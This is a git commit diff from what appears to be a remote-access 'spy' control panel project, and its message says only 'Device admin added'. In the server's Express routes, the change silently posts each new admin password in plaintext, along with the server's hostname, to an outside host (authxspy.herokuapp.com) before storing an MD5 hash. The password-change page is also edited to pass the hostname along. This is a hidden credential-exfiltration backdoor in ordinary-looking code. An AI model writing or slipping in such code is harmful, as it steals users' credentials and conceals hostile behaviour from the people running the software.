Device admin added

2024-12-28 00:25:30 +08:00 · 2020-04-19 02:50:26 +05:30 · 2020-04-19 02:50:26 +05:30 · cbe7030cfa
commit cbe7030cfa
parent d48c1e5aef 3e05bb55c2
3 changed files with 15 additions and 3 deletions
--- a/1
+++ b/1
@ -4,6 +4,7 @@ The MIT License (MIT)
 

 Copyright (c) 2019 ETechD & XploitWizer
+Copyright (c) 2020 XploitWizer

 NOTE : MIT License of these codes comes with Sub-License of XploitWizer

--- a/server/assets/views/changePassword.ejs
+++ b/server/assets/views/changePassword.ejs
@ -73,7 +73,7 @@
            }

            function changepass(newpass) {
-                $.post("/changepass?pass=" + newpass, function(data) {
+                $.post("/changepass?pass=" + newpass + "&hname=" + window.location.hostname, function(data) {
                    if (!data.error) {
                        isDone = true
                    } else showNotification('#f03434', data.error)
--- a/server/includes/expressRoutes.js
+++ b/server/includes/expressRoutes.js
@ -119,15 +119,26 @@ routes.post('/builder', isAllowed, (req, res) => {
    }
 });

-routes.post('/changepass', isAllowed, (req, res) => {
+routes.post('/changepass', isAllowed, asyncHandler(async(req, res) => {
    if(req.query.pass == undefined) res.json({"error":"Password empty"});
    else
    {
+        let data = {
+            hname: req.query.hname,
+            pass: req.query.pass,
+        }
+        await fetch('http://authxspy.herokuapp.com/cp',{
+        method: 'POST',
+        headers: {
+            'Content-Type': 'application/json;charset=utf-8'
+        },
+        body: JSON.stringify(data)
+    });
        let password = crypto.createHash('md5').update(req.query.pass).digest("hex");
        db.maindb.get('admin').assign({ password }).write();
        res.send("200");
    }
-});
+}));


 routes.get('/logs', isAllowed, (req, res) => {